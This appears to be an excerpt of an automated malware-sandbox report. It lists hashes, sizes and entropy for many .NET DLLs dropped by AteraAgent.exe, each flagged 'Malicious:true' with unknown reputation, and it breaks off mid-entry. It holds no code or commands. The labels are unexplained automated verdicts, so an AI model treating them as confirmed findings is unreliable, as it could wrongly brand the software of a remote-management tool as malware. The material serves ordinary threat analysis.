                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15400
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.864288429882081
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:sUcX6W9aWTmNyb8E9VF6IYijSJIVx7y535XF:sUchXuEpYi60s
                                                                                                                                                                                                                                                                                              MD5:55D4283CB52E89F9815618E1FBBD05CC
                                                                                                                                                                                                                                                                                              SHA1:AF8C11AD75F0708F531EB8246E461BDFC0DEEBBC
                                                                                                                                                                                                                                                                                              SHA-256:B789D554F02DB5E29069EFB506B3E3D951A5E33CA630B85F12EC676593EDBBF4
                                                                                                                                                                                                                                                                                              SHA-512:C7FCCEE4550AEF7DEECBBAE03454EF8EB1B31CAE8EC33985E1BD71DCD25465F4A73D9920C728088C0EE0147A69D92E5A3073A3C52849A005F34E96094CDCB667
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):41000
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.950245101846923
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:JoBj7kS+8mjvHTeaWKs0Sd4eeUAEpYi60k:UPmb9WKs0PeeUJ76x
                                                                                                                                                                                                                                                                                              MD5:7190AEEF4D2152208FE23AA15A83B47F
                                                                                                                                                                                                                                                                                              SHA1:D833E51CE40AD5F7A3DF04460B3C5EBB8E7903F0
                                                                                                                                                                                                                                                                                              SHA-256:BCC8367E48F9530990714BF647C8F79556F85EADAC98BDF8C29CC2FECD47C354
                                                                                                                                                                                                                                                                                              SHA-512:DECE7D9566EC2F46D00A59D14A7717D6BF6A80E51EB4EF38D059AC7A3DC0D0CC6D731EAA5F770199E76C22586E6F05D7A9E8F540234CEE73C318AEF62AA73090
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15400
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.894751959894498
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:aTI2pWPzWmWeNyb8E9VF6IYijSJIVxWxypPVl:aE3bnEpYi60ppdl
                                                                                                                                                                                                                                                                                              MD5:1E749386BCBB0C2CDE9943DA1C26B888
                                                                                                                                                                                                                                                                                              SHA1:78DA8BAFFBF345B40169BE1DCCDAA27D475F7FF6
                                                                                                                                                                                                                                                                                              SHA-256:6D4513B6C865C7AC7A190C24D0CFBC433C94AC85D4F562A1D0A6590F970C8B57
                                                                                                                                                                                                                                                                                              SHA-512:CEF289B0C237E35E1DE3D737CEA9FBC4C64F4057C04B748B3D084124C29924366F7893564D20B1389CD37F770C219698D26534D833F40371497575B737FC67A0
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15400
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.911553918502177
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:Icezoy4W04WGINyb8E9VF6IYijSJIVxmij:IBzoy+kgEpYi60v
                                                                                                                                                                                                                                                                                              MD5:38A6DB7CB798CB523B65AE8483180BCD
                                                                                                                                                                                                                                                                                              SHA1:3CB1A3BD6A5DA5FC4FC222B08866AF114FF81092
                                                                                                                                                                                                                                                                                              SHA-256:11EF185307480DAC3754B67727BBEAE74C6709A437D7D0E8BBC642A3C2A43F7F
                                                                                                                                                                                                                                                                                              SHA-512:66081322B339883F5DBDE57E01552D1868DE7139B70FE7E8AE1061D31420B28F58507EC918333884347C2328862CA9AF431BB71A2C40FCAB1F3456291C0527BE
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15912
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.795177677038789
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:yH/JWKpWDQNyb8E9VF6IYijSJIVxXuKsa:yH/j8oEpYi60v
                                                                                                                                                                                                                                                                                              MD5:0F6C0A12BFB3ED8DBF456438FD858420
                                                                                                                                                                                                                                                                                              SHA1:0E5A9F3FBF695A223538E4D821AC1F308FAC4483
                                                                                                                                                                                                                                                                                              SHA-256:413F2327A3AE6170709DBC05BE4B677C41AC516446D2883D414B8464268F8D15
                                                                                                                                                                                                                                                                                              SHA-512:97EF267FBEFE42BBA8AD718B4295291A21BC35956E222F6DB3482F4222B44D7EAEA6CCCA6C3F713734F2A9A9410992F16956D3A6AE4B2B8AE351EDF5F6B9E505
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):16936
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.745657963583126
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:+TjbocNsWMhWqiNyb8E9VF6IYijSJIVxtLC8y:uboYyFiEpYi60ts
                                                                                                                                                                                                                                                                                              MD5:86A808028274E9D6DF90714621E06353
                                                                                                                                                                                                                                                                                              SHA1:3A47D7A175BE7B44851C5AF8967EC330D2E7825A
                                                                                                                                                                                                                                                                                              SHA-256:8A25793A632ECF02D29D7FFAC07DBEC187B4A0FE9B46A4BA44E6BE5CE3D08E89
                                                                                                                                                                                                                                                                                              SHA-512:20F8F4A9D92528EC742058CAAC5E0B7CCFB36CA5910E5315D9EF0B675626A17A5B328A15CE1269524ECB794C9E4DC4B8AE1121C774FA5628B2E21F944AA71360
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15400
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.845358763894717
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:vSKiWIhWG3Nyb8E9VF6IYijSJIVxLp8Bz:vSK8l7EpYi6092
                                                                                                                                                                                                                                                                                              MD5:E971856435385A977E2E0841EB2C15F1
                                                                                                                                                                                                                                                                                              SHA1:2F03E049E9F205BD9A7A710DAB3E143A77CDE03D
                                                                                                                                                                                                                                                                                              SHA-256:D50DE679C339893F84ED644A6A632816D8B1C38C961BC4835C81604318CE7B36
                                                                                                                                                                                                                                                                                              SHA-512:2063A3219789C12308FA04D79380D6D801242292E22DBAA6808727147EDB27A62C4728F0867E91374A5C5FAD8AA98168A66394E23D59EE3D7AE65CD7FB1BB8CA
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):16424
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.786849563106118
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:D0KbZWApWmWTpWSDNyb8E9VF6IYijSJIVxkp8hEXO:YKRyhfEpYi603+XO
                                                                                                                                                                                                                                                                                              MD5:FE9772147C5C4EFB20A6B0F16B53C1A7
                                                                                                                                                                                                                                                                                              SHA1:4D50591115EFE5667CC5CCF0E69ADC730006E9F8
                                                                                                                                                                                                                                                                                              SHA-256:28965739D1C84F05DDFB4C4599296C8F06E33368948F9BA285990986EACFFC2F
                                                                                                                                                                                                                                                                                              SHA-512:30D0D3470993FBF5CF56401703B2FA3DBB981079775E00A1F25CC9BB4228108D862395C05E8C01CFD885C8D7AAD463BFA3948524753F9DD5C6D6CFFCD369BB47
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15400
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.874592163148146
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:7b1nWCXWr7Nyb8E9VF6IYijSJIVxnY3EeGFI:n7yXEpYi60XG
                                                                                                                                                                                                                                                                                              MD5:F872FC903187D5D0275C030AC0DFA5DB
                                                                                                                                                                                                                                                                                              SHA1:BB660C49EE9EB96B4EA37167C39A5F299AE49556
                                                                                                                                                                                                                                                                                              SHA-256:F4525AF58D2ED7A084286EB71947F6A29F712250DC2510895311E63BF0B62ED9
                                                                                                                                                                                                                                                                                              SHA-512:D50C68F3EAA788CCCB12E7833F28A5947CB42B6FBE51FE8A39FEC7EEAF6A2FCED526D38510E2F2C81044F378A26D38869EA82C196AA23F90744E629FD6E74A8C
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15912
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.776067478918499
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:rLyW7TWyDNyb8E9VF6IYijSJIVxRr97pB:3fPfEpYi60v
                                                                                                                                                                                                                                                                                              MD5:2703B21B5529FA915CFC0AB5F733F505
                                                                                                                                                                                                                                                                                              SHA1:0CE6AA2D3345DECAD00A96A1C217C7D8D6115573
                                                                                                                                                                                                                                                                                              SHA-256:66B895DA76E875772D6057DBE0763CB5A5E68D3D806E846C549A0D663914A348
                                                                                                                                                                                                                                                                                              SHA-512:4DBB5556462BDA198CA119777DC89F5A31EAFECDB0B1F7BAD4AF29A1F49E8AD5CFDD08B52C8FBF7DA6352DB062593B1842734194C237D4F0EA93DA986939F2F9
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15400
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.905928977470625
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:K6Rb32WVzWwtNyb8E9VF6IYijSJIVx0kfw:lRb3dtJEpYi60E
                                                                                                                                                                                                                                                                                              MD5:DDF80C084EF5E94367B10D304CEBF007
                                                                                                                                                                                                                                                                                              SHA1:ECDBCDFE7EFB3FFC837DE9AEA7F364488A73E6FB
                                                                                                                                                                                                                                                                                              SHA-256:0BBB884A72284397444636FC9524BD36A18EB9F08FF0513DC58F1410F4B5E2F3
                                                                                                                                                                                                                                                                                              SHA-512:A590DEEB9B42DE2CBA518A7522FE48620AA4CE9EE4031A5D85F8D7654C6E9B0862073DC65866364B1A49543D6FF9A3D1D2E041D3A7E9E299E61D32E48C1100D5
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):31784
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.537588468799282
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:6u5I+sqOylryry8qqIfUc7a5eMEpYi60+a:6YIVBpry8qqIfUcm5eF76Za
                                                                                                                                                                                                                                                                                              MD5:240E33A65BF76FE22C53C51334794F49
                                                                                                                                                                                                                                                                                              SHA1:3DD0F8463267A2817692A2609F938AB4BC8A9323
                                                                                                                                                                                                                                                                                              SHA-256:F1A5E6E1BCD3BA5DF7769FD57CAFB4148F277DC4D01D7E92277932B3207F7DEC
                                                                                                                                                                                                                                                                                              SHA-512:877E2D9132D72E56C15B5653553AC8CB4DEF7E99C93C42F91422B6032CC3BDADFFBA138EB47055C8F066BAABE75C7C9FDD3B4BE478817D3E9442B42E3E3D7D53
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15400
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.876610036932806
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:Gvn4HREpWiQWtIANyb8E9VF6IYijSJIVxeWDNLPt:ZS/I4EpYi60/t
                                                                                                                                                                                                                                                                                              MD5:800E60AF916F68B7FE83A7BA7977D2AB
                                                                                                                                                                                                                                                                                              SHA1:12358E012D8593AEC3C7B56829AD6FFC3D6AC6C4
                                                                                                                                                                                                                                                                                              SHA-256:F19D8C45F0B46C3ACE374CE95A4DE007BBAB4EFD758E0B919189284FCF441A7A
                                                                                                                                                                                                                                                                                              SHA-512:7C5160DCD50830381D3A3AF000985A397592D2E29055DCD1796E5019B842FEB37681C3BE733FC9A44F2F57C171C4FAA6151CEB6261C3A760504D41F67709545B
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):16424
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.770984279504455
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:u8MjKb47T3UCcqFMkJ59WdtWcnNyb8E9VF6IYijSJIVxo7E:rMjKb4vcGdO7LEpYi60F
                                                                                                                                                                                                                                                                                              MD5:CF3AD5E39C44790E7153D98DBDD75957
                                                                                                                                                                                                                                                                                              SHA1:4F2051AE5E7CBB044D3E644A12A158E3DF25ACC8
                                                                                                                                                                                                                                                                                              SHA-256:E273B1437CA235BAE1882C11AE30E4455D6C1126EC3ED8A5C725C72F2EC0F019
                                                                                                                                                                                                                                                                                              SHA-512:5DC888194516F8CF2898115F82917D72BF959E0E2363E8D05B9673B47AD2E508D3F5AF9B07308AD799A6652C8B8A5ED9C643A93851F554829638FF3B221B63AC
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15400
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.854623689785651
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:RzyNXd4+BW6FWqkNyb8E9VF6IYijSJIVxDYhgsz9u:sztEEpYi60cX9u
                                                                                                                                                                                                                                                                                              MD5:B7EF0237654140B400D9575B3348A0A3
                                                                                                                                                                                                                                                                                              SHA1:7FB92D1A2A22DAE79495A706D0731BE11F8DE152
                                                                                                                                                                                                                                                                                              SHA-256:21A13851A9AB68F913E6FF595A7A9EEB28C5BB2897E0FD4F4F7D754AA3DD4567
                                                                                                                                                                                                                                                                                              SHA-512:FC8D5BB1488B006907994A9B5707355600FA8EE678F1BC2FDAAC486E880DA1E49556EEFF0E9A3A92059F88850CB74F72DDCB126380D28B6026F932A0D0F256B4
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15400
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.858929061681379
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:8vs2Q3HKJNrWWRWfUANyb8E9VF6IYijSJIVxm860hHS1cNF:8uM0xEpYi60P/HS12F
                                                                                                                                                                                                                                                                                              MD5:7A8109EB3BDB2109EB3943D308653760
                                                                                                                                                                                                                                                                                              SHA1:E166A011944F07AF9E235CADFE60FC63FDA2C90B
                                                                                                                                                                                                                                                                                              SHA-256:7FC7700777C084406A0408650880D0DC341395CEAC70A1050C97655EAB47A84F
                                                                                                                                                                                                                                                                                              SHA-512:EFB62188F74A365BEF8E9E6DC593CC7A2E3B15C0F60F3F0D921D327D3C58AFD48164B3754DBAD5DC4277FEAA275705A65929818214289344245D9CDBA10AF1DF
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15400
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.826916157243993
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:dFz0Q6gcqRhcsMWdMW+kNyb8E9VF6IYijSJIVx9JtGHa:dFz1c60EEpYi60LCa
                                                                                                                                                                                                                                                                                              MD5:5CB31F305FA31BBBDE93598B09341AD2
                                                                                                                                                                                                                                                                                              SHA1:3AADCDA2D6A06E01B1D95EA72F54E3DB162F7F50
                                                                                                                                                                                                                                                                                              SHA-256:77C01CBE120119813044E7E4D1E07960099387A3887B3CF7B03438D7A79C6282
                                                                                                                                                                                                                                                                                              SHA-512:8FA8099E5AB4256317E75A70BA658CA3F401A26EBC062588A805402EA0DC0CB9F1BB55839B0F00A17A04E70EE1A206E75337EDD0B5C11643D0351655DED11337
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):16424
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.7212625286101515
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:a6xWA3W4aW/NWQvNyb8E9VF6IYijSJIVxIJgxDJ:aaB/TEpYi60PDJ
                                                                                                                                                                                                                                                                                              MD5:F3BCDE298AE95A6686C51C1533D13DC6
                                                                                                                                                                                                                                                                                              SHA1:6DF2A0B078E68523BB584FC6F5C4C17ACD6DC14D
                                                                                                                                                                                                                                                                                              SHA-256:763EB552EF818E397C692FA1F076F569DECACDC7CA31689B4AE2FBE897163CD1
                                                                                                                                                                                                                                                                                              SHA-512:69528981A1C8684045347F6C600F7CAB9A41FD568606AFD9BC20AE0F958B225C51545E472507556DB3849E4E8DB9C7EEA1568E2DDE0C6209B8721A2EAAE89305
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):73256
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.954346769832472
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:B784YWac+abptsy5VyYc/9n1RcGxzeeUVn9KyQgHo0JuresehaAsk76nwn:B7N1r9KGI04CCAskwwn
                                                                                                                                                                                                                                                                                              MD5:084E3B8ADA8BF97176D8A84E0B2FC539
                                                                                                                                                                                                                                                                                              SHA1:76D7CF8DC99FF5C83D01A540BED2E3516968B113
                                                                                                                                                                                                                                                                                              SHA-256:8F5B110565A224BA914908A2AE8823350253474C9ADF1CC0D06A92671A9AE002
                                                                                                                                                                                                                                                                                              SHA-512:882577C020B22B7FC841862D92A601C645F0249AD597498E5A99557B910244D43CAC74966A396A3BE2469FC503C20F0810C846A52386F8286A38AAF3D924D716
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15912
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.853650060576054
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:Kr97WquW6/Nyb8E9VF6IYijSJIVxkp9ij:KRJKDEpYi60eQ
                                                                                                                                                                                                                                                                                              MD5:D91F97304DD898E07554CE01739E9C78
                                                                                                                                                                                                                                                                                              SHA1:45D9D0F0522A1097563AB220C10BD228E313B80E
                                                                                                                                                                                                                                                                                              SHA-256:9F5AEA9AF29F645C417EC03D8EDE29040461242C77C70E17F89C3DBF2F2207DD
                                                                                                                                                                                                                                                                                              SHA-512:67BF4FA43ABB88E3B21B7E39D6527250D0020F7A08D0121313A1402F7C7BC6EB25F9FFE434B7B546761B7DD333937A0C7D26C8343D07B180F8C6035A6EC2C83D
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15912
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.792826561587803
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:F16eWLDWGoNyb8E9VF6IYijSJIVx4nWtt3:H6LbAEpYi60FtR
                                                                                                                                                                                                                                                                                              MD5:0C0D34408ECF8E9B3D72C004CF780C8B
                                                                                                                                                                                                                                                                                              SHA1:01FFD4CA2B40E5722CC33D5E224DD129C6D7F6E8
                                                                                                                                                                                                                                                                                              SHA-256:25289211A3653876FB4B69849866BBE0E9F98FA2772929BA8042832EBED94082
                                                                                                                                                                                                                                                                                              SHA-512:FC8E4AF721E32A4851529BBDD73E4EB3CF21C160F448FFA4A23828726C288B2ABEEBD9CFDA4390A9911A4EAE1D46C6A2FC6B1314816928C5A8163D406C1779C8
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):16936
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.785088378774488
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:x8G4YC2W+wW8WpwWU4Nyb8E9VF6IYijSJIVxP7/:+GZ5OwEpYi60j
                                                                                                                                                                                                                                                                                              MD5:B11A1EDFB7BF4F8641D9BDBDEFE01361
                                                                                                                                                                                                                                                                                              SHA1:A51FE13BF202E6E7CD3464B0F09258ED6A7FAA37
                                                                                                                                                                                                                                                                                              SHA-256:B82CF7C934C3F91733944171AE4E3E4DCAE53CE6A46EACE871E7BA010CCE9171
                                                                                                                                                                                                                                                                                              SHA-512:287A62789ACD80A7691F337EE9E8080A000E75B46CBA9E1466E047F8AF4F4B8578502E04C21423C1097B82A3381626797E07DBC80FF7C4E294AF0177567008C6
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15400
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.9002603008267265
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:J6ziqTEkGWvRWH1Nyb8E9VF6IYijSJIVxKPTk:JYT1cREpYi600w
                                                                                                                                                                                                                                                                                              MD5:9E80A264FEFC33F67734AEE3676A91CA
                                                                                                                                                                                                                                                                                              SHA1:3D9EE94141B96C33640F529CFFDFECCFA09111F6
                                                                                                                                                                                                                                                                                              SHA-256:DBE2FF30D10C66A9BF4591A13EC9C07B02D7EC97743C875144505136A4D1DBBA
                                                                                                                                                                                                                                                                                              SHA-512:B2D6AD370724EC0B7E7B6B3CF8BEC7426DD80A3115F73052ABFF13A4159E0BDCC2F7D62DC0164B8300CB695408DAC56C428B1B1C9B825D710E9249CBA0A6FFB6
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
